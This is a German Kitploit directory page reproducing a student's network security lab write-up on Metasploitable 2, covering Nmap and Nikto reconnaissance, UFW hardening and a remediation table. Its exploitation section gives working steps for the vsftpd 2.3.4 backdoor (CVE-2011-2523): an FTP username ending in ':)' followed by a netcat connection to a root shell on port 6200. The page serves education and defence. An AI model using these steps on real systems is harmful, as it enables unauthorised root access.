Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/amirmuhammadmarvi/network-security-lab
AufklärungSchwachstellenscannerSchwachstellenanalyseExploitationKonfigurationsprüfungWebsicherheitNetzwerksicherheitPenetrationstestsLernen & Bildung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
network-security-lab — Kontrolliertes virtuelles Angriffs- & Verteidigungslabor — CVE-2011-2523-Ausnutzung, Nmap-Erkundung, Nikto-Scanning, UFW-Härtung auf Metasploitable 2 | Kitploit
Labs & Praxis
GitHubamirmuhammadmarvi/network-security-lab

network-security-lab

Kontrolliertes virtuelles Angriffs- & Verteidigungslabor — CVE-2011-2523-Ausnutzung, Nmap-Erkundung, Nikto-Scanning, UFW-Härtung auf Metasploitable 2

Repository anzeigen
vor 2 MonatenNoch nicht geprüft
Teilen

🔬 Netzwerk-Sicherheitslabor

Eine kontrollierte virtuelle Umgebung, die reale Angriffs- und Verteidigungsszenarien simuliert

Python Platform CVE Status


📋 Überblick

Dieses Labor simuliert einen realen Penetrationstest und eine defensive Härtungsübung in einer vollständig isolierten virtuellen Umgebung. Es demonstriert den gesamten offensiven Sicherheitslebenszyklus – von der Aufklärung bis zur Ausbeutung – und die defensiven Kontrollen, die jedes Risiko mindern würden.

Wichtigstes Ergebnis: Vollständiger Root-Zugriff auf dem Zielrechner in unter 60 Sekunden durch Ausnutzung einer bekannten Hintertür, ohne Anmeldedaten und ohne spezielle Werkzeuge.


🏗 Laborumgebung

KomponenteDetails
HypervisorVMware Workstation
NetzwerkHost-Only / NAT (vollständig isoliert)
Angreifer-BSUbuntu 24 LTS
Ziel-BSMetasploitable 2 (Linux 2.6.x)
Angreifer-IP192.168.148.255
Ziel-IP192.168.148.130

🎯 Methodik

root@kitploit:~
Reconnaissance  →  Scanning  →  Exploitation  →  Defense & Hardening

🔍 Phase 1 – Aufklärung

Port-Scanning mit Nmap

root@kitploit:~
sudo nmap -sV -O 192.168.148.130 -oN scan_before.txt

Wichtigste Ergebnisse – insgesamt 23 offene Ports:

Web-Scanning mit Nikto

root@kitploit:~
nikto -h http://192.168.148.130 -o nikto_before.txt

18 Schwachstellen gefunden, darunter:

  • phpMyAdmin öffentlich freigelegt
  • phpinfo.php gibt vollständige Serverkonfiguration preis
  • HTTP TRACE aktiviert (XST-Angriffe)
  • Verzeichnis-Indizierung aktiviert auf /doc/, /test/
  • Veralteter Apache 2.2.8 und PHP 5.2.4

💥 Phase 2 – Ausbeutung

CVE-2011-2523 – vsftpd 2.3.4 Hintertür

vsftpd 2.3.4 enthält eine Hintertür, die durch einen Kompromiss in der Lieferkette eingeführt wurde. Das Senden eines Benutzernamens, der auf :) endet, veranlasst den Server, eine Root-Shell auf Port 6200 zu öffnen.

root@kitploit:~
# Step 1 — Trigger the backdoor via FTP
ftp 192.168.148.130
# Username: backdoor:)   Password: anything

# Step 2 — Connect to the spawned shell
nc 192.168.148.130 6200

# Step 3 — Verify access
whoami
# → root

Ergebnis: Vollständiger Root-Zugriff auf das System in < 60 Sekunden erreicht – keine Anmeldedaten, kein Exploit-Framework erforderlich.

Auswirkung: Ein Angreifer mit Root-Zugriff kann jede Datei lesen/ändern/löschen, Malware installieren, Daten exfiltrieren oder zu anderen Hosts im Netzwerk wechseln.


🛡 Phase 3 – Verteidigung und Härtung

UFW-Firewall – Standard-Verweigerungsrichtlinie

root@kitploit:~
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow 22/tcp    # SSH only
sudo ufw status verbose

Empfohlene Abhilfemaßnahmen


📄 Vollständiger Bericht

Siehe report.md für die vollständige Bewertung – vollständige Methodik, Befehlsausgaben, Ergebnistabelle, Ausbeutungsschritte und alle Abhilfeempfehlungen.


⚠️ Rechtlicher Hinweis

Dieses Labor wurde in einer vollständig isolierten virtuellen Umgebung mit absichtlich anfälliger Software (Metasploitable 2) durchgeführt. Alle Techniken dienen nur zu Bildungs- und Portfoliozwecken. Nicht auf Systemen replizieren, die Sie nicht besitzen oder für die Sie keine ausdrückliche schriftliche Genehmigung zum Testen haben.


🛠 Verwendete Werkzeuge


Autor: Amir Mohammad Marwi

Portfolio LinkedIn GitHub

Tool herunterladen
PortDienstVersionRisiko
21FTPvsftpd 2.3.4🔴 KRITISCH – Bekannte Hintertür (CVE-2011-2523)
22SSHOpenSSH 4.7p1🟡 MITTEL – Veraltet
23TelnetLinux telnetd🟠 HOCH – Klartext-Protokoll
80HTTPApache 2.2.8🟠 HOCH – Mehrere CVEs
1524BindshellRoot-Shell🔴 KRITISCH – Offene Root-Shell
3306MySQL5.0.51a🟠 HOCH – Datenbank freigelegt
5900VNCProtocol 3.3🟠 HOCH – Schwache Authentifizierung
6667IRCUnrealIRCd🔴 KRITISCH – Bekannte Hintertür
SchwachstelleBehebung
vsftpd 2.3.4 HintertürUpgrade auf vsftpd 3.x oder Migration zu SFTP
Offene Root-Shell (Port 1524)Sofort deaktivieren, Installation überprüfen
Telnet (Port 23)Deaktivieren – nur SSH erzwingen
phpMyAdmin freigelegtPer IP einschränken, starke Authentifizierung verlangen
MySQL freigelegt (Port 3306)An localhost binden, externen Zugriff blockieren
VNC freigelegt (Port 5900)Per IP einschränken oder deaktivieren
Verzeichnis-IndizierungApache: Options -Indexes
HTTP TRACEApache: TraceEnable off
Veralteter Apache + PHPUpgrade auf unterstützte LTS-Versionen
WerkzeugZweck
NmapPort-Scanning und Dienst-Erkennung
NiktoWeb-Schwachstellenscan
NetcatVerbindung zur Hintertür-Shell
UFWHost-basierte Firewall-Konfiguration
FTP-ClientAuslösen der vsftpd-Hintertür
VMware WorkstationLabor-Virtualisierung